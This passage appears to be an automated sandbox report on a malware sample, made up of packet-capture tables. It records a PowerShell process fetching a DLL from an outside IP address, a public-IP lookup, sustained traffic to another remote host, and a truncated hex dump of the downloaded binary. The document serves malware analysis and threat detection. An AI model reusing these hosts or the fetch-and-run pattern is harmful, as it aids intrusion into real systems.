                                                                                                  Dec 19, 2024 08:53:06.275851011 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.275876045 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.275906086 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.275922060 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.276345968 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.276396036 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.276396990 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.276444912 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.276633978 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.276798964 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.276865959 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.276982069 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.277024031 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.277208090 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.277292967 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.277323008 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.277378082 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.277740002 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.277757883 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.277792931 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.277815104 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.278014898 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.278064966 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.278096914 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.278140068 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.278438091 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.278527975 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.278569937 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.278614044 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.278709888 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.278759956 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.278830051 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.278928041 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.279010057 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.279021025 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.279061079 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.279069901 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.279073000 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.279175997 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.279412985 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.279460907 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.279470921 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.279520035 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.279546022 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.279609919 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.279841900 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.279930115 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.279963017 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.280013084 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.280159950 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.280205011 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.280246973 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.280296087 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.280347109 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.280396938 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.280436039 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.280473948 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.280495882 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.280544043 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.280575037 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.280617952 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.280672073 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.280711889 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.280720949 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.280761003 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.280886889 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.281004906 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.281049967 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.281101942 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.281114101 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.281152964 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.281192064 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.281244993 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.281282902 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.281326056 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.281339884 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.281411886 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.281467915 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.281470060 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.281511068 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.281538010 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.281626940 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.281677961 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.281702995 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.281744957 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.281821966 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.281832933 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.281949997 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.281994104 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.282017946 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.282042980 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.282074928 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.282103062 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.282143116 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.282170057 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.282218933 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.282291889 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.282382965 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.282594919 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.282653093 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.282704115 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.282754898 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.282758951 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.282793999 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.282857895 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.282883883 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.282928944 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.282972097 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.283014059 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.283023119 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.283071995 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.283114910 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.283154011 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.283175945 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.283220053 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.283263922 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.283281088 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.283299923 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.283325911 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.283354998 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.283392906 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.283449888 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.283484936 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.283504009 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.283548117 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.283569098 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.283606052 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.283723116 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.283763885 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.283797979 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.283842087 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.283844948 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.283879995 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.283910990 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.283948898 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.284188032 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.284224987 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.284307957 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.284344912 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.284390926 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.284429073 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.284444094 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.284455061 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.284486055 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.284517050 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.284609079 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.284737110 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.284785986 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.284831047 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.284962893 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.285013914 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.285047054 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.285096884 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.285098076 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.285136938 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.285161018 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.285201073 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.285245895 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.285263062 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.285294056 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.285310984 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.285387039 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.285433054 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.285475969 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.285537958 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.285543919 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.285564899 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.285583973 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.285609007 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.285664082 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.285794973 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.285845995 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.285887957 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.285912037 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.285933018 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.285964012 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.285979033 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.286016941 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.286045074 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.286083937 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.286118984 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.286155939 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.286189079 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.286226034 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.286251068 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.286292076 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.286319017 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.286362886 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.286397934 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.286438942 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.286468029 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.286504984 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.286535025 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.286577940 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.286603928 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.286638975 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.286681890 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.286690950 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.286725998 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.286968946 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.287051916 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.287060976 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.287112951 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.287146091 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.287184000 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.287213087 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.287251949 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.287360907 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.287415028 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.287519932 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.287570000 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.287575006 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.287612915 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.287619114 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.287717104 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.287725925 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.287760973 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.287779093 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.287800074 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.287903070 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.288126945 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.288178921 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.288232088 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.288361073 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.288362980 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.288369894 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.288415909 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.288420916 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.288460016 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.288464069 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.288568974 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.288691998 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.288733959 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.288769960 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.288779020 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.288820982 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.288892031 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.288937092 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.288938999 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.288981915 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.288983107 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.289009094 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.289036036 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.289060116 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.289081097 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.289129972 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.289135933 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.289171934 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.289237976 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.289278984 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.289334059 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.289371014 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.289393902 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.289416075 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.289449930 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.289555073 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.289593935 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.289597988 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.289637089 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.289640903 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.289680958 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.289706945 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.289742947 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:06.289762974 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.289819002 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:06.289860010 CET4970915666192.168.2.5193.3.19.151
                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                  Dec 19, 2024 08:52:57.369358063 CET192.168.2.51.1.1.10xe740Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                  Dec 19, 2024 08:52:57.507122040 CET1.1.1.1192.168.2.50xe740No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                  Dec 19, 2024 08:52:57.507122040 CET1.1.1.1192.168.2.50xe740No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                  Dec 19, 2024 08:52:57.507122040 CET1.1.1.1192.168.2.50xe740No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.549704147.45.47.15806152C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 19, 2024 08:52:40.967886925 CET169OUTGET /iviewers.dll HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                  Host: 147.45.47.15
                                                                                                  Connection: Keep-Alive
                                                                                                  Dec 19, 2024 08:52:42.215856075 CET1236INHTTP/1.1 200 OK
                                                                                                  Date: Thu, 19 Dec 2024 07:52:42 GMT
                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                  Last-Modified: Wed, 18 Dec 2024 13:27:42 GMT
                                                                                                  ETag: "1800-6298b60de3f6f"
                                                                                                  Accept-Ranges: bytes
                                                                                                  Content-Length: 6144
                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: application/x-msdos-program
                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 93 65 61 67 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 0c 00 00 00 08 00 00 00 00 00 00 ae 2b 00 00 00 20 00 00 00 40 00 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 00 00 00 04 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 04 40 00 00 28 00 00 00 5c 2b 00 00 4f 00 00 00 00 60 00 00 b8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELeag!+ @ @@(\+O` H.text `.sdataV@@.rsrc`@@.reloc@B
                                                                                                  Dec 19, 2024 08:52:42.215948105 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                  Data Ascii: +H!`T+rp(-rp(-+rp*rSp**(*V( ((
